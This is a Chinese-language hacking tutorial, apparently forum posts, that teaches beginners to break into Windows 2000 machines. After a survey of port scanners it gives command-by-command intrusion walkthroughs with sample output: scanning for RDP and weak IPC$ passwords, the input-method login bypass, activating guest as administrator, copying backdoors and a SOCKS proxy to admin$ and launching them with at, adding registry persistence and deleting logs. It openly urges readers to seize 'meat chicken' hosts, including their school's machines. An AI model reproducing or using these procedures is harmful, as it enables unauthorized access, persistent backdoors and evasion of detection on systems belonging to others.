提示:如果你隐藏了Perl include目录(目录中有Perl include文件),并且在PATH环境变量中没有包含该目录,你需要加上这个目录;同时,用户应该注意NSS需要ftplib.pl库函数。NSS具有并行能力,可以在许多工作站之间进行分布式扫描。而且,它可以使进程分支。在资源有限的机器上运行NSS(或未经允许运行NSS)应该避免这种情况,在代码中有这方面的选项设置。
你可在下面地址找到NSS拷贝。http://www.giga.or.at/pub/hacker/unix
二。Strobe(超级优化TCP端口检测程序)
strobe是一个TCP端口扫描器,它可以记录指定机器的所有开放端口。strobe运行速度快(其作者声称在适中的时间内,便可扫描整个一个国家的机器)。
strobe的主要特点是,它能快速识别指定机器上正在运行什么服务。strobe的主要不足是这类信息是很有限的,一次strobe攻击充其量可以提供给“入侵者”一个粗略的指南,告诉什么服务可以被攻击。但是,strobe用扩展的行命令选项弥补了这个不足。比如,在用大量指定端口扫描主机时,你可以禁止所有重复的端口描述。(仅打印首次端口定义)其他选项包括:
■定义起始和终止端口
■定义在多长时间内接收不到端口或主机响应,便终止这次扫描。
■定义使用的socket号码
■定义strobe要捕捉的目标主机的文件
提示:在你获得strobe的同时,必然获得手册页面,这对于Solaris 2.3是一个明显的问题,为了防止发生问题,你必须禁止使用getpeername()。在行命令中加入-g 标志就可以实现这一目的。
同时,尽管strobe没有对远程主机进行广泛测试,但它留下的痕迹与早期的ISS一样明显,被strobe扫描过的主机会知道这一切(这非常象在/var/adm/messages文件中执行连接请求)。
三。SATAN(安全管理员的网络分析工具)
SATAN是为UNIX设计的,它主要是用C和Perl语言编写的(为了用户界面的友好性,还用了一些HTML技术)。它能在许多类UNIX平台上运行,有些根本不需要移植,而在其他平台上也只是略作移植。
注意:在Linux上运行SATAN有一个特殊问题,应用于原系统的某些规则在Linus平台上会引起系统失效的致命缺陷;在tcp-scan模块中实现select()调用也会产生问题;最后要说的是,如果用户扫描一个完整子网,则会引进反向fping爆炸,也即套接字(socket)缓冲溢出。但是,有一个站点不但包含了用于Linux的、改进的SATAN二进制代码,还包含了diff文件,这些条款可以在ftp.lod.com
上发现,或者可以直接从Sun站点(sunsite.unc.edu)取得diff文件:
/pub/linux/system/network/admin/satan-linux.1.1.1.diff.gz
SATAN用于扫描远程主机的许多已知的漏洞,其中包括,但并不限于下列这些漏洞:
■FTPD脆弱性和可写的FTP目录
■NFS脆弱性
■NIS脆弱性
■RSH脆弱性
■Sendmail
■X服务器脆弱性
你可在下面地址中获得SATAN的拷贝:http://www.fish.com
安装过程
SATAN的安装和其他应用程序一样,每个平台上的SATAN目录可能略有不同,但一般都是/satan-1.1.1。安装的第一步(在阅读了使用文档说明后)是运行Perl程序reconfig。这个程序搜索各种不同的组成成分,并定义目录路径。如果它不能找到或定义一个浏览器。则运行失败,那些把浏览器安装在非标准目录中(并且没有在PATH中进行设置)的用户将不得不手工进行设置。同样,那些没有用DNS(未在自己机器上运行DNS)的用户也必须在/satan-1.1.1/conf/satan.cf中进行下列设置:$dont_use_nslookuo=1;在解决了全部路径问题后,用户可以在分布式系统上运行安装程序(IRIX或SunOS),我建议要非常仔细地观察编译,以找出错误。
提示:SATAN比一般扫描器需要更多一些的资源,尤其是在内存和处理器功能方面要求更高一些。如果你在运行SATAN时速度很慢,可以尝试几种解决办法。最直接的办法就是扩大内存和提高处理器能力,但是,如果这种办法不行,我建议用下面两种方法:一是尽可能地删除其他进程;二是把你一次扫描主机的数量限制在100台以下。最后说明的一点是,对于没有强大的视频支持或内存资源有限的主机,SATAN有一个行命令接口,这一点很重要。
四。Jakal
Jakal是一个秘密扫描器,也就是就,它可以扫描一个区域(在防火墙后面),而不留下任何痕迹。
秘密扫描器工作时会产生“半扫描”(half scans),它启动(但从不完成)与目标主机的SYN/ACK过程。从根本上讲,秘密扫描器绕过了防火墙,并且避开了端口扫描探测器,识别出在防火墙后面运行的是什么服务。(这里包括了像Courtney和GAbriel这样的精制扫描探测器)
在下面地址中可以找到由Half life,Jeff(PhiJi)Fay和Abdullah Marahie编写的Jakal拷贝:http://www.giga.or.at.pub/hacker/unix
⑸IdentTCPscan
IdentTCPscan是一个更加专业化的扫描器,其中加入了识别指定TCP端口进程的所有者的功能,也就是说,它能测定该进程的UID。
五.CONNECT
CONNECT是一个bin/sh程序,它的用途是扫描TFTP服务子网
六。FSPScan
FSPScan用于扫描FSP服务顺。FSP代表文件服务协议,是非常类似于FTP的Internet协议。它提供匿名文件传输,并且据说具有网络过载保护功能(比如,FSP从来不分*)。FSP最知名的安全特性可能就是它记录所有到来用户的主机名,这被认为优于FTP,因为FTP仅要求用户的E-mail地址(而实际上根本没有进行记录)。FSP相当流行,现在为Windows 和OS/2开发了GUI客户程序
七。XSCAN
XSCAN扫描具有X服务器弱点的子网(或主机)。乍一看,这似乎并不太重要,毕竟其他多数扫描器都能做同样的工作。然而,XSCAN包括了一个增加的功能:如果它找到了一个脆弱的目标,它会立即加入记录。
XSCAN的其他优点还包括:可以一次扫描多台主机。这些主机可以在行命令中作为变量键入(并且你可以通过混合匹配同时指定
上面的有些是英文界面的,不过好像不少都用汉化补丁,找找吧。
还要推荐一个特好的(我第一次见到她就喜欢上了)就是SSS,Shadow Security Scanner
下载:http://www.20cn.net/cgi-bin/download/down.cgi?list=scaner
天天安全的SSS下载能即使更新
关于NAMP的使用大家看看这个帖子 http://www.91one.net/dvbbs/dispbbs.asp?boardid=17&id=1362&star=1#1362
有人提意见了,说讲的太慢了,可我无法想象你连扫描,端口之类还弄不清楚,怎么进一步发展呢,昨天讲了扫描,相信很多朋友已经PING 了很多主机了吧,千万别弄我的啊,我用的是人家的主机,他们很白的。找到了漏洞的目的是什么呢?是控制对方,即是获得远程shell。shell这个概念是从UNIX下继承过来的,是指与xx作系统核心的一种交互方式和界面。还是不懂是吗?有篇关于SHELL的帖子大家去看一看
http://www.91one.net/dvbbs/dispbbs.asp?boardid=17&id=1426
,如果还不知道就算了,你知道有这个词就可以了。
怎么得到shell呢?这很关键,有很多方法:典型的例子是telnet。得到shell的办法有很多种,比如通过系统自带的telnet,终端服务。或者用木马和工具提供的,如winshell,冰河等等。说到冰河我不想说那么多没有篇文章很好大家看一下:http://978229.myrice.com/tty/Preview.htm#MAILLISTDOC19
得到shell后,不是所有权限都会开的,得到管理员权限当然是我们的梦想了。所以有时会有提升权限的问题。当然这也是利用了漏洞。
Win2K 提升权限漏洞
http://www.yesky.com/20010530/182273.shtml ;
Microsoft SQL Server Webtasks权限提升漏洞 http://www.mhdn.net/se/2002-11-08/6386.html
Linux kernel ptrace提升权限漏洞 http://www.softhouse.com.cn/docs/southpark2169.html
IIS提升权限漏洞
http://moon-soft.com/e_commerce/soft/doc/readelite572760.htm
当然这些漏洞大都有补丁可下了,如果管理员勤快的话就不好了,不过很多人都很马虎的,我认识个管理员是一个高校的,用的是win2000竟从不打补丁,理由是俺用的是D版的,打补丁恐怕会冲系统啊(有道理啊)
觉得讲shell还不透彻(有朋友发短信问我了),我查了一下资料:
Shell是什么?
任何发明都具有供用户使用的界面。UNIX供用户使用的界面就是Shell(DOS的command熟悉吧,但UNIX的要强大的多)。Shell为用户提供了输入命令和参数并可得到命令执行结果的环境。形象点就是:dos中的command.com就是一种shell程序
今天就说到这,最后写个小知识:针对网吧的限制 对有些朋友或许有用哦
http://www.91one.net/dvbbs/dispbbs.asp?boardid=17&id=769
第13章
从终端服务3389讲起
昨天我们讲到了提升权限的问题,好现在我们就来说一个简单的入侵,从3389找个肉鸡(没有肉鸡的话,对自己的技术提高是没好处的,不能老是看却不练啊,陈同学你说对吗?)
请各位注意,我这里并不是说什么烂鬼输入法漏洞。这种漏洞差不多已经绝迹了,太难找了,如果有人找到了,那恭喜你啦。众所周知,有开3389的一般都是服务器,也就是说有很大可能带局域网的,而内部入侵比外部要方便一点,这对大家是很好的,我想看我这个东西的很多都是学生吧(声明我就个学生哦)。如何能快速方便的得到开了终端的肉机呢?这需要用到两个工具,都是扫描工具来的,scanner3.0和焦点的xscan。打开scanner,输入一段IP,范围要大一点,scanner速度很快的。在“所有端口从”那里都填3389,点击“开始”就可以开工了。
很快的,扫描完成,结果出来了。点击右下脚的“删除”把多余的IP删了,只留下开了3389的IP。再点击“保存”,把结果保存到文件夹里。找到保存文件的目录,打开它。用记事本的替换功能把它保存为一个纯IP的TXT文件。“编辑-替换”在“查找内容”里输入要删除的垃圾,再点“全部替换”就行了。打开xscan,点击左边的蓝色按钮,进入“扫描板块”,只需在“SQL-Server弱口令”“NT-Server弱口令”前打钩,其他都清除掉。再点击右边的蓝色按钮,进入“扫描参数”,钩上“从文件获取主机列表”,打开刚才替换成纯IP的TXT文件,确定之后就可以扫描了。这时需要比较长的时间!(注意我是拿3.0为例的,其他的也差不多)。确定目标,用mstsc(登陆终端的工具,这个我不喜欢用,但确实很容易上手的)登陆对方主机后,打开对方cmd.exe,输入“net use”,先看看有没有人也在连接这部机(安全一点好,毕竟不是在学雷峰啊)。“net view”命令之后当出现一堆前面带\\字符的就表示~~就表示什么呢??我想大家都非常明白吧!,如果不明白的话,我。。(也不知道怎么说了 )
想做个补充
发现很多朋友对什么叫终端服务有点模糊
好,我们就详细说说 毕竟这个概念很重要的
终端服务提供了通过作为终端仿真器工作的“瘦客户机”软件远程访问服务器桌面的能力。终端服务只把该程序的用户界面传给客户机。客户机然后返回键盘和鼠标单击动作,以便由服务器处理。每个用户都只能登录并看到它们自己的会话,这些会话由服务器操作系统透明地进行管理,而且与任何其他客户机会话无关。客户软件可以运行在多个客户机硬件设备上,包括计算机和基于 Windows 的终端。其他设备,如 Macintosh 计算机或基于 UNIX 的工作站,也可以使用其他第三方的软件连接到终端服务器。
终端服务可以在应用服务器模式或远程管理模式下在服务器上进行配置。作为应用服务器,终端服务提供了一种有效而可*的方式,通过网络服务器分发基于 Windows 的程序。在应用服务器模式下,终端服务为可能无法正常运行 Windows 的计算机显示 Windows 2000 的桌面以及目前基于 Windows 的大多数应用程序。在远程管理模式下使用时,终端服务提供了远程访问的能力,使您可以从网络上的任何地方虚拟地管理您的服务器。
终端服务有以下好处:
更快地显示 Windows 2000 的桌面。终端服务架设了一座从旧式桌面迁移到 Windows 2000 Professional 的桥梁,为非计算机桌面以及需要进行硬件升级才能在本地完全运行 Windows 2000 操作系统的计算机提供了一种虚拟的 Windows 2000 桌面环境。终端服务客户可用于多种不同的桌面平台,包括 MS-DOS、基于 Windows 的终端、Macintosh 和 UNIX。(与 MS-DOS、Macintosh 和基于 UNIX 的计算机的连接需要附加的软件)。
充分利用已有的硬件。终端服务扩展了分布式计算模型,允许计算机同时作为瘦客户机和具有完整功能的个人计算机操作。当计算机在现有的网络上时,可以继续使用,同时也可作为能仿真 Windows 2000 Professional 桌面的瘦客户机使用。
程序的集中配置。使用运行在 Windows 2000 Server 上的终端服务,所有程序的执行、数据的处理以及数据的存储都在服务器上进行,程序得以集中配置。终端服务可确保所有客户机都能访问当前版本的程序。软件只能在服务器上安装一次,而不能安装在您单位的每个桌面上,这样可减少单独更新计算机所花费的成本。
远程管理。终端服务提供了对 Windows 2000 Server 的远程管理,为系统管理员提供了从任何客户机通过广域网或拨号连接远程管理其服务器的一种方法。
功能:
易于使用
可管理性
安全性
易于使用
功能 说明 详细信息,请参阅:
自动的本地打印机支持 Windows 2000 Server 终端服务可以添加并自动重新连接终端服务客户所连接的打印机。提供对本地打印机的客户访问
剪贴板重定向 现在,用户可以在运行于本地计算机和终端服务器上的程序之间剪切和粘贴。共享的剪贴板
性能增强 对缓存功能的增强,包括持久性缓存、数据包的利用和数据帧大小,明显地改进了终端服务的性能。位图缓存
漫游式断开连接支持 此功能使用户不用注销即可从会话中断开连接。在断开时会话仍可保持活动状态,这使得用户可以从另一台计算机中或在稍后某个时间重新连接到现有会话。重新连接需要登录,以便在任何时候都能保证每个会话的安全性。注销或断开连接
多登录支持 用户可以登录到多个会话,同时从一个或多个客户机到多个 Windows 2000 Server,或者多次登录到一个服务器。这样,用户就可以同时执行多项任务或运行多个单独的桌面会话。管理用户和客户机
可管理性
功能 说明 详细信息,请参阅:
会话远程控制 支持者可查看或控制另一终端服务会话。键盘输入、鼠标移动以及图形显示可在两个终端服务会话之间共享,为支持者提供了诊断和解决配置问题以及远程培训用户的能力。此功能对于带有分支机构的单位特别有用。远程控制
网络负载平衡 网络负载平衡使终端服务客户可连接到运行终端服务的服务器组中最轻闲的成员。网络负载平衡和终端服务
基于 Windows 的终端 根据 Windows CE 操作系统和远程桌面协议 (RDP) 的自定义实现,不同的制造商可提供基于 Windows 的终端。
客户连接管理器 管理员和用户可以为一个程序或全部桌面访问建立到服务器的预定义连接。客户连接管理器在客户机桌面上创建图标,以便能通过一次单击连接到一个或多个终端服务器。想在计算环境中提供单个程序的管理员可以创建连接并将该连接与终端服务客户软件一同分发。管理终端服务用户连接
终端服务授权 终端服务授权帮助系统管理员和采购部门跟踪客户机及其相关许可证。授权终端服务
分布式文件系统 (DFS) 支持 对分布式文件系统 (DFS) 的支持使用户可以连接到 DFS 共享位置,而且使管理员可以从终端服务器主控 DFS 共享。分布式文件系统概述
终端服务管理器 管理员可以使用终端服务管理器查询和管理 Windows 2000 Server 上的终端服务会话、用户和进程。管理终端服务
终端服务配置 终端服务连接配置可用于创建、修改和删除 Windows 2000 Server 上的一个或一组会话并访问服务器设置。配置终端服务
与 Windows 2000 Server“本地用户和组”以及“Active Directory 用户和计算机”的集成 管理员可以按照为 Windows 2000 Server 用户创建帐户的相同方式为终端服务用户创建帐户。另有一些字段可用来指定终端服务专用信息,如终端服务配置文件路径和主目录。终端服务用户帐户
与 Windows 2000 Server 系统监视器的集成 与 Windows 2000 Server 系统监视器的集成使管理员可以监视器终端服务系统性能,包括跟踪处理器的使用情况、内存分配和分页内存使用情况,并在每个用户的会话之间交换。性能监视
消息传递支持 管理员可以就一些重要的信息警告用户,如系统关机、升级或新程序。使用终端服务管理器
远程管理 具有管理级特权而且可访问终端服务管理级实用程序的任何用户都可以远程管理运行终端服务的服务器的各方面工作。
可配置的会话超时设置 管理员可以通过配置会话超时来减少服务器资源的使用。管理员可以指定活动会话的长度以及会话可在服务器上闲置多长时间 配置会话限制
安全性
功能 说明 详细信息,请参阅:
加密 多级加密使管理员可以根据安全性需要在三种不同级别(低级、中级或高级)上加密在 Windows 2000 Server 和终端服务客户之间传输的所有或部分数据。另外,终端服务登录过程包括更改密码、桌面解锁以及屏幕保护功能解锁。登录过程是加密的,以确保用户名称和密码的安全传输。终端服务支持在服务器和客户机之间的 40 位和 128 位加密(128 位加密只能在美国和加拿大使用)。确定加密的级别
限制登录尝试和连接时间 管理员可以限制用户登录尝试次数,以防止有人未授权访问服务器。另外,个别用户或分组用户的连接时间可以进行限制。配置终端服务
终端服务配置概述
终端服务连接提供了客户机可用于登录到服务器上某个会话的链接。TCP/IP 连接是当终端服务在 Windows 2000 Server 上启用时自动配置的。使用终端服务配置,您可以更改连接的默认属性或添加新连接。
终端服务配置
打开终端服务配置时,您将会看到已经配置的连接。这称为 RDP-TCP 连接。通常,这只是需要为使用终端服务器的客户配置的连接。对于终端服务器,只能为每个网卡配置一个 RDP(远程桌面协议)连接。如果要配置其他的 RDP 连接,您必须安装附加的网卡。
使用终端服务配置,您可以重新配置 RDP-TCP 连接的属性,包括限制客户机会话在服务器上保持活动状态的时间、设置加密的保护级别以及选择您希望用户和组具备的权限。某些连接属性也可以使用“本地用户和组”的终端服务扩展程序在每用户基础上配置。例如,当您使用“本地用户和组”的终端服务扩展程序时,可以为每个用户设置不同会话期限。使用终端服务配置,您可以只在每连接基础上设置会话期限,这意味着相同期限将应用于使用连接登录到服务器的所有用户。
除配置连接以外,您可以使用“终端服务配置”功能配置可应用于终端服务器的设置。包括临时文件夹的设置、默认连接安全性以及启用/禁用 Internet 连接器许可。详细信息,请参阅配置服务器设置。
基于 Citrix CA 的客户机
终端服务配置还用于为基于 Citrix CA 的客户机配置连接。当 Citrix CA 协议和基于 Citrix CA 的客户软件添加到该系统时,可以使用 TCP/IP、同步、IPX/SPX 或 NetBIOS 传输协议配置这些连接
有很多朋友问怎么开启3389终端服务下面我们一起来探索一下远程开启3389的方法.首先我们应该了解3389终端服务,可以运行在什么系统下,个人了解,终端服务在M$的大部分
产品中都可运行,如:winnt4/win2000server/win2000ADV-server/win2000DS/XP等.
但winnt4中是需要单独购买的,2000专业版不能远程安装终端服务的,至少我没成功过.
我们在以下的探索中,是以win2000server和高级server为例的.(现在用的也最多).
现在开始.假设我们拿到了一个主机的管理员帐户和密码.
主机: 192.168.0.1
帐号: administrator
密码: 7788
2000系统安装在c:\winnt下
从上面的的介绍可以知道,2000专业版是不可以远程安装终端服务的,那我们就要首先来
判断此主机是专业版还是服务器版,才能进入下一个环节.我们可以先用对方所开帐户判断: c:\>letmein \\192.168.0.1 -all -d
stating connecting to server ...
Server local time is: 2002-1-13 10:19:22
Start get all users FORM server...
--------------------------
Total = 5
--------------------------
num0= Administrator ()
num1= Guest ()
num2= IUSR_servername (Internet 来宾帐号 )
num3= IWAM_servername (启动 IIS 进程帐号)
num4= TsInternetUser (TsInternetUser)
--------------------------
Total = 5
-------------------------- 一般情况num2/3/4这三个帐户都是2000server默认开启的.
2000专业版默认是不开这些帐户的.我们也可以扫描对方开放的端口进一步确认:
用扫描软件如:superscan3.exe扫描对方所开端口
判断对方是否开启25,3372等2000server默认开启的端口.当然我们还可以使用一些工具,如:cmdinfo.zip
这2个东东可以获得本地或远程NT/2K主机的版本,系统路径,源盘路径,PACK版本,安装时间等一
系列信息,一个图形界面,一个命令行.
通过返回的信息就可以很清楚的了解对方主机情况.还有一些其他的方法来判断,如:从对方所开的服务来确定等,
从上面的判断准确率还算高,别的就不一一说明了.
如果你在以上步骤里发现对方主机并没有那3个帐户,默认端口也没开,
或cmdinfo返回的信息对方是2000专业版,你就要放弃安装3389的计划了.
现在我们要进入下一环节:
判断终端服务到底有没有安装? 你也许要问:为什么还要判断啊?我扫描没有发现3389端口啊
这里就需要解释一下,如果装了终端服务组件,可能有哪几种情况扫描不到3389端口?
1.终端服务termservice在"管理工具">>>"服务"中被禁用.
2.终端服务连接所需的RDP协议在"管理工具">>>"终端服务配置"中被停用连接.
3.终端服务默认连接端口3389被人为的改变.如何改变请看修改终端服务默认的3389端口
4.终端服务绑定的网络适配器不是外网的.
5.防火墙和端口过滤之类的问题.
6.....(还有我没想到的)
其实,我们遇到最多的情况就是以上5种情况.现在开始判组件是否被安装.先与远程主机连接,映射远程主机C盘为本地Z盘
net use z: \\192.168.0.1\c$ "7788" /user:"administrator"
命令成功完成。然后转到Z盘,检查
Z:\Documents and Settings\All Users\「开始」菜单\程序\管理工具>
里是否有 "终端服务管理器"和"终端服务配置"的快捷方式文件
如有已安装服务组件的会有,反之,没有(98% 人为故意删的可能性较小)
我们还可以在下一步telnet到对方主机后使用终端服务自带的命令进一步的核实.判断完毕,对方好像是没有安装终端服务组件,可以进入下一步:
telnet登陆对方主机,准备安装服务组件.在这里,我强烈建议使用2000自带的telnet服务端登陆,
有回显,不容易出错.个人感觉使用它,一次成功的比例高很多.(呵呵~,个人理解啊!)
就算没有开,打开用完后再关掉就完了.
.abu.写的最快速登录WIN2K TELNET 服务已经把这个方法介绍的非常详细,
而且他的办法(在本机建立同名,同密码帐户),让快速实现telnet登陆成为现实.假如我们已开启对方23端口,
telnet 192.168.0.1
输入用户名/密码
*===============================================================
欢迎使用 Microsoft Telnet 服务器。
*===============================================================
C:\>
\\成功进入!!!! 进入后,再次检查终端组件是否安装:
c:\>query user
这个工具需要安装终端服务.这样就进一步确定了组件没有被安装.如果返回:
USERNAME SESSIONNAME ID STATE IDLE TIME LOGON TIME
>w1 console 0 运行中 .2002-1-12 22:5
\\类似这样的信息,可能组件就已安装.好!都清楚了,可以开始安装了.
---------------------------------------------------
C:\>dir c:\sysoc.inf /s //检查INF文件的位置
c:\WINNT\inf 的目录 2000-01-10 20:00 3,770 sysoc.inf
1 个文件 3,770 字节
-----------------------------------------------------
C:\> dir c:\sysocmgr.* /s //检查组件安装程序
c:\WINNT\system32 的目录 2000-01-10 20:00 42,768 sysocmgr.exe
1 个文件 42,768 字节
-----------------------------------------------------
c:\>echo [Components] > c:\wawa
c:\>echo TSEnable = on >> c:\wawa
//这是建立无人参与的安装参数
c:\>type c:\wawa
[Components]
TSEnable = on
//检查参数文件
------------------------------------------------------
c:\>sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\wawa /q
-----------------------------------------------------
这一条就是真正安装组件的命令.
以上这条命令没有加/R参数,主机在安装完后自动重起.
如若加了/R参数主机就不会重起.如果一切正常的话,几分钟后对方主机将会离线,当它重新回来时,
3389终端服务就已经开启.你就可以连上去了.问题和建议: A 在安装过程中,不使用/R,有时主机也不会重起,你就要手动重起他,但在使用诸如:iisreset /reboot命令时,对方
的屏幕会出现个对话框,写着谁引起的这次启动,离重起还有多少秒.B 一次不行可以再试一次,在实际中很有作用.C 在输入sysocmgr命令开始安装时,一定不要把命令参数输错,那会在对方出现一个大的对话框,是sysocmgr的帮助,很是显眼,
而且要求确定.在你的屏幕上是不会有任何反应的,你不会知道出错,所以会有B的建议.
好了以后你就想干什么就干什么了。不过有时候还真不知道干什么,总之得干个事,装个什么局域网控制软件,不过不要体积太大,容易被发现。
超强 C 语言代码,你有信心看懂吗?
刚刚说有输入法漏洞的机子很少了,但有些朋友担心还有怎么办,不是吃大亏了吗?这样我找了一篇写的不错的文章贴一下( 注意是转载)写的不错,据说是新写的,这位大哥也真闲啊
WIN2000中文简体版存在的输入法漏洞,可以使本地用户绕过身分验证机制进入系统内部。经实验,WIN2000中文简体版的终端服务,在远程操作时仍然存在这一漏洞,而且危害更大。
WIN2000的终端服务功能,能使系统管理员对WIN2000进行远程操作,采用的是图形界面,能使用户在远程控制计算机时功能与在本地使用一样,其默认端口为3389,用户只要装了WIN2000的客户端连接管理器就能与开启了该服务的计算机相联。因此这一漏洞使终端服务成为WIN2000的合法木马。
工具:客户端连接管理器,下载地址:自己找吧,天天有好几种呢。
入侵步骤:
一,获得管理员账号。
我们先对一个网段进行扫描,扫描端口设为3389,运行客户端连接管理器,将扫描到的任一地址加入到,设置好客户端连接管理器,然后与服务器连结。几秒钟后,屏幕上显示出WIN2000登录界面(如果发现是英文或繁体中文版,放弃,另换一个地址),用CTRL+SHIFT快速切换输入法,切换至全拼,这时在登录界面左下角将出现输入法状态条(如果没有出现,请耐心等待,因为对方的数据流传输还有一个过程)。用右键点击状态条上的微软徽标,弹出“帮助”(如果发现“帮助”呈灰色,放弃,因为对方很可能发现并已经补上了这个漏洞),打开“帮助”一栏中“操作指南”,在最上面的任务栏点击右键,会弹出一个菜单,打开“跳至URL”。此时将出现WIN2000的系统安装路径和要求我们填入的路径的空白栏。比如,该系统安装在C盘上,就在空白栏中填入"c:\winnt\system32"。然后按“确定”,于是我们就成功地绕过了身份验证,进入了系统的SYSTEM32目录。
现在我们要获得一个账号,成为系统的合法用户。在该目录下找到"net.exe",为"net.exe"创建一个快捷方式,右键点击该快捷方式,在“属性”->“目标”->c:\winnt\system32\net.exe后面空一格,填入"user guest /active :yes"点“确定”。这一步骤目的在于用net.exe激活被禁止使用的guest账户,当然也可以利用"user 用户名 密码/add",创建一个新账号,但容易引起网管怀疑。运行该快捷方式,此时你不会看到运行状态,但guest用户已被激活。然后又修改该快捷方式,填入"user guest 密码",运行,于是guest便有了密码。最后,再次修改,填入“localgroup administrators guest /add,将guest变成系统管理员。
注意事项:1、在这过程中,如果对方管理员正在使用终端服务管理器,他将看到你所打开的进程id,你的ip和机器名,甚至能够给你发送消息。
2、终端服务器在验证你的身份的时候只留给了你一分钟的时间,在这一分钟内如果你不能完成上述操作,你只能再连结。
3、你所看到的图像与操作会有所延迟,这受网速的影响。
二,创建跳板。
再次登录终端用务器,以"guest"身份进入,此时guest已是系统管理员,已具备一切可执行权。打开“控制面板”,进入“网络和拔号连接”,在“本地连接”或“拔号连接”中查看属性,看对方是否选择“Microsoft 网络的文件和打印机共享”,如果没有,就打上勾。对方如果使用的是拔号上网,下次拔号网络共享才会打开。
退出对方系统,在本地机命令提示符下,输入
net use \\IP Address\IPC$ ["password"] /user:"guset",通过IPC的远程登陆就成功了。
登陆成功之后先复制一个Telnet的程序上去(小榕流光安装目录下的Tools目录里的Srv.exe,另外,还有ntml.xex,一会要用),这个程序是在对方上面开一个Telnet服务,端口是99。
copy c:\hack\srv.exe \\***.***.***.***\admin$
然后利用定时服务启动它,先了解对方的时间:
net time \\***.***.***.***
显示:
\\***.***.***.*** 的当前时间是 2001/1/8 下午 08:55
命令成功完成。
然后启动srv.exe:
at \\***.***.***.*** 09:00 srv.exe 
显示:
新加了一项作业,其作业 ID = 0
过几分钟后,telnet ***.***.***.*** 99
这里不需要验证身份,直接登录,显示:
c:\winnt:\system32>
我们就成功登陆上去了。然后又在本地打开命令提示符,另开一个窗口,输入:
copy c:\hack\ntlm.exe \\211.21.193.202\admin$
把事先存放在hack目录里的ntlm.exe拷过去。然后又回到刚才的telnet窗口,运行ntlm.exe
C:\WINNT\system32>ntlm
显示:
Windows 2000 Telnet Dump, by Assassin, All Rights Reserved.
Done!
C:\WINNT\system32>
C:\WINNT\system32>
好,现在我们来启动WIN2000本身的telnet,首先终止srv.exe的telnet服务:
net stop telnet 系统告诉你并没有启动telnet,不理它,继续:
net start telnet 这次真的启动了telnet,我们可以在另开的命令提示符窗口telnet到对方的
23端口,验证身份,输入我们的guest账号和密码,它就真正成为我们的跳板了。我们可以利用它到其它的主机去。
三、扫除脚印:
删除为net.exe 创建的快捷方式,删除winnt\system32\logfiles下边的日志文件
第14章
从简单的网络命令讲起
昨天的帖子发表后,很多朋友问了很多问题,我发现很多朋友对基本的网络命令还很生疏,请你看这个帖子,里面讲的很详细的http://www.91one.net/dvbbs/dispbbs.asp?boardID=14&ID=403
有个朋友问了我个问题:端口映射是什么意思??
其实很简单的,采用端口映射(Port Mapping)的方法,可以实现从Internet到局域网内部机器的特定端口服务的访问。例如,你所使用的机子处于一个连接到Internet的局域网内,你在机子上所开的所有服务(如FTP),默认情况下外界是访问不了的。这是因为你机子的IP是局域网内部IP,而外界能访问的只有你所连接的服务器的IP,由于整个局域网在Internet上只有一个真正的IP地址,而这个IP地址是属于局域网中服务器独有的。所以,外部的Internet登录时只可以找到局域网中的服务器,那你提供的服务当然是不起作用的。
所以解决这个问题的方法就是采用PM了。
有篇文章不错。大家看看:http://www.pconline.com.cn/pcedu/soft/lan/jywgl/10301/127157.html
继续讲,昨天有人说我找到个肉鸡,但不会用远程控制软件。先说用什么好呢
我推荐Remote Administrator,有篇介绍它的文章很好:http://www.pcworld.com.cn/2002/back_issues/2205/0533e.asp
下载:http://www.skycn.com/soft/15592.html
我想里面的说明你应该能很好理解的
现在我以一个例子来说一下怎么获得一个肉鸡,虽然前面一直在说,但好象有点乱的,下面说的这个有点投机取巧的感觉,至少我这样觉得,不过因为很多朋友说都5天了,我什么都没搞到啊,所以只能。。
第一步:扫描弱口令
这里我用20cn开发的scanipc (这http://down.yqdown.com/xdown/yqdown0316/scanipc.rar有下的)
不一会就会扫到很多有弱口令的主机
(你可以拿你们学校的IP试试)
这里我用opentelnet(远程启动TELNET的小东西,这里下:http://www.infosw.com/down/software.asp?id=1520)给扫描到开了空口令的主机开个端口让我们telnet连接上去
,开了23端口,并可以连接上的主机就不用进行次步骤了!
Opentelnet使用方法:
OpenTelnet.exe \\server <帐号> <密码>
列如:
C:\>OpenTelnet.exe \\192.168.1.2 administrator 123456 1 90 用户名:administrator 密码:123456
NTLM认证方式:1(也可以选择0请自己测试) 开的端口:90
运行完,如果屏幕上出现 Disconnecting server...Successfully! 就说明已经成功。
这样,我们就能够得到一个开90端口的Telnet服务器了。
Telnet 192.168.1.2 90
这样就可以登录上去了。
第三步:配置并安装后门程序
这里我选择WinShell(小巧精干我喜欢下载:http://www.hktk.com/soft/soft_server/winshell.html),用winshell主程序设置好后门,然后把后门程序传到台FTP空间上!
列如:
c:\>ftp
ftp>openwww.cnwill.com
然后输入用户名字 密码把后门传上去mput c:\cnwill.exe
现在我们登陆到肉鸡上 Telnet 192.168.1.2 90
把刚上传的后门程序下载并运行(别忘记删除 后门程序)
『后门也可以用net命令完成』
net user \\192.168.1.2 90\ipc$ "" /user:"administrator"
[ 建 立 IPC$ 连 接 ]
copy d:\zilong.exe \\192.168.1.2 90\admin$\system32
[ 上 传 一 个 后 门 程 序 到 对 方 的 主 机 里]
copy d:\long.exe \\192.168.1.2 90\admin$\system32
[上 传 一 个 删 除 日 志 程 序 到 对 方 的 主 机 里]
copy d:\scoks.exe \\192.168.1.2 90\admin$\system32
[ 上 传 一 个 SCOKS 代 理 程 序 到 对 方 的 主 机 里]
copy d:\zilong.reg \\192.168.1.2 90\admin$\system32
[上 传 导 入 注 册 表的 REG 文 件 到 对 方 的 主 机 里]请看后门说明
net time \\192.168.1.2 90
[ 得 到 对 方 主 机 的 当 前 时 间]
at \\192.168.1.2 90 13:20 zilong.exe
[用 a t命 令 执 行 我 们 的 后 门 程 序] 别 把 时 间 搞 错 了 哦
==============
如果大家用不习惯命令的话,那就用流光的IPC种植者吧,简单易用.这里就不赘述啦
=============
telnet 192.168.1.2 90
[ 从 我 们 设 置 的 后 门 程 序 登 陆 主 机 ]
net user **** /add
[近来后添加一个用户名再说或者也可以选择激活guest]
net localgroup administrators **** /add
[ 把 自 己 添 加 到 管 理 组 里,这 样 我 们 就 是 超 级 管 理 员 了]
regedit /s c:\winnt\system32\zilong.reg
[ 把 后 门 程 序 导 入 注 册 表 的 启 动 项]这样做是防止被别人停止我们
的后门服务程序,就算我们的后门服务程序被停止了,在主机重启动后我们的后门
服务就又继续运行了.
SOCKS -install
[ 开 始 安 装 socks 代 理]
SCOKS -config starttype 2
